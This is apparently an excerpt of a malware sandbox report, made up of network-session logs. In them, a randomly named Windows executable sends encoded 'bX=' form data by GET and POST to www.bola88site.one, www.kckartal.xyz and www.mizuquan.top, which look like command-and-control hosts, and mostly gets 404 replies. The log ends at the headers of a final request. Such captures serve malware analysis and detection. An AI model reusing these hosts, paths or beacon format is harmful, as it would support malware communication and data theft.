                              28192.168.2.558673172.96.191.3980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:37.389144897 CEST464OUTGET /3lkx/?bX=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:38.353701115 CEST1033INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:38 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.558674104.21.20.12580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:43.412455082 CEST724OUTPOST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 35 48 6e 68 63 79 4c 41 5a 74 50 45 75 50 4d 62 59 35 45 42 31 55 64 70 6a 55 6f 6a 6e 39 52 75 65 2b 68 4c 6f 51 3d
                              Data Ascii: bX=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5HnhcyLAZtPEuPMbY5EB1UdpjUojn9Rue+hLoQ=
                              Sep 16, 2024 09:31:43.986692905 CEST1236INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:43 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0vilVpx40x61Ge10nFDxY7ev4DGRdez%2BsvnRawnbjux7c6%2BETtY4dcE6UgMYxG%2BF7OMUdQiFHeRMIQpu%2F1SwTQwXpvq0dJh2%2F50YRDKl4YpHSKoGvwECirpTNLRvBaoP9f18"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f2896cfba42d7-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                              Sep 16, 2024 09:31:43.986711979 CEST240INData Raw: 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47
                              Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.558675104.21.20.12580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:45.957672119 CEST744OUTPOST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 34 6c 35 77 63 66 79 58 63 34 30 39 75 52 56 2f 47 79 57 46 4b 38 4f 77 4d 30 79 71 67 72 49 4f 68 31 70 76 50 48
                              Data Ascii: bX=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSV4l5wcfyXc409uRV/GyWFK8OwM0yqgrIOh1pvPH
                              Sep 16, 2024 09:31:46.544471979 CEST1236INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:46 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZx2ihxGdHIqA2AtrHtjPuWTSu1gx6QacJUPtVkIv0kYDSfOWXuP4XVdWyGuZioI6vJGbyQFVvxO19hKk99fkz7odlFbJA3qFGQ82ZsvWZ8e4E446nFbW2X57E9NqDxgpbTu"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28a6ad0d43b3-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
                              Sep 16, 2024 09:31:46.544578075 CEST230INData Raw: 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae
                              Data Ascii: E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.558676104.21.20.12580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:48.502749920 CEST1761OUTPOST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 52 41 48 65 7a 69 46 35 56 6d 4c 45 74 42 78 69 4d 46 31 48 4a 42 33 4c 7a 71 52 4e 6d 58 4c 6d 57 45 4a 48 46 30 2f 71 74 67 52 4b 68 50 70 6f 54 4a 64 6f 6d 42 6d 33 71 50 69 54 4a 56 43 36 4e 70 50 57 44 45 41 79 64 32 59 79 75 5a 74 46 37 51 4f 72 79 4e 67 54 2b 37 52 57 64 7a 50 77 44 46 38 79 4d 51 36 42 42 34 4d 58 69 50 2b 6c 65 46 4e 2f 51 62 36 78 36 41 72 35 79 4e 50 4b 32 49 44 6c 73 52 78 6a 2b 6e 68 41 58 47 74 41 75 44 53 63 56 67 37 58 38 61 32 64 56 6b 67 4e 70 41 7a 63 50 [TRUNCATED]
                              Data Ascii: bX=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTqRAHeziF5VmLEtBxiMF1HJB3LzqRNmXLmWEJHF0/qtgRKhPpoTJdomBm3qPiTJVC6NpPWDEAyd2YyuZtF7QOryNgT+7RWdzPwDF8yMQ6BB4MXiP+leFN/Qb6x6Ar5yNPK2IDlsRxj+nhAXGtAuDScVg7X8a2dVkgNpAzcPYvuAIxyaTZW5mzBq33cmnwQVkzXnDtdClB9XnmJdFs/8f53CC1NJH60akV1wMq3mQ1PHXpKxg3Yx0ccgxPhcUKBsq1TJSi6ZXuDIKrRDMArrbLam65LPj280h3yU87GSATI0NnueiVBh0MbXLhC6XgczpDrRR31qE3MHF93MloeD2zSaYQXeTRWhaNZRfND+o73SUXiF3zq5nfEgMq3JUsbW0PRlB41zuX53sTEGktKCUJlgeWrI1yvgsopeWKICSXN7RljKecwVAI2XXvQV0XQ0nQ21glMOw6Do+YucRqqj6NVTz+jEsx/0fTlvSGC5UnOcpBzdNNIZ+fy7f+rKdOtxYWvhncn5AsI42tZ2ez0NDzJjHq/2TM6STO/9VkaO5rU7N0R1YkyJ3GjDaLPuS5ruwNUtVp+6pyYYsccAfji05WmNuONQCMatL78GsV9UWSdfJLmj4zWd7Iu54ntw9yhC4SixVfSJmoMucXzUb66zB5/8UMkoRaEwfJ8Wi/BWCeJVeMHe8Q2WQ7JY+Tiyp0Iax4UeYFNwt7UX1CnlnpRqfPd8bMaj6PjRyGa3EPJVnONe1aek7s4oNxajZYSB58G/v+BnfieRIUuVCB6HmgSWIh7ls1ZEewT3jgtZBxzi56r6LuvKVjPQO/Axoop+qfueVeBrkZU913 [TRUNCATED]
                              Sep 16, 2024 09:31:49.109253883 CEST1236INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:49 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FTPFsx%2BVEncxtcn2fF8bUNjyJdX%2FokuNVp8xbBaCAFow10tzPvMDQJDJp3CfkMtLjk93fbeUbTQSBBovQRCN21EkoBmPfPLXWh5WSPK0pXTsoCD5bRHMHzJCM%2B%2FLdkXTdGP"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28b6bc4a7d06-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                              Sep 16, 2024 09:31:49.109277010 CEST235INData Raw: 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47
                              Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.558677104.21.20.12580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:51.045483112 CEST462OUTGET /h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:51.620973110 CEST1236INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:51 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttT8K7JoGOXZsZvmzwVA2OgfsdzDKa2OkCicYGYlU1Mhk3LGGcIt0QMR9Hk4dUeCUlWETQH04pkrDWAvZy%2B%2FpyoC9cy159a0FxshnXJ5SUyckxv08bjoFzT4oSikOoyau%2FQ7"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28c6783f8cc8-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                              Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; t
                              Sep 16, 2024 09:31:51.620992899 CEST730INData Raw: 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30
                              Data Ascii: op: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.55490443.242.202.16980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:59.019413948 CEST724OUTPOST /ed2j/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mizuquan.top
                              Origin: http://www.mizuquan.top
                              Referer: http://www.mizuquan.top/ed2j/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
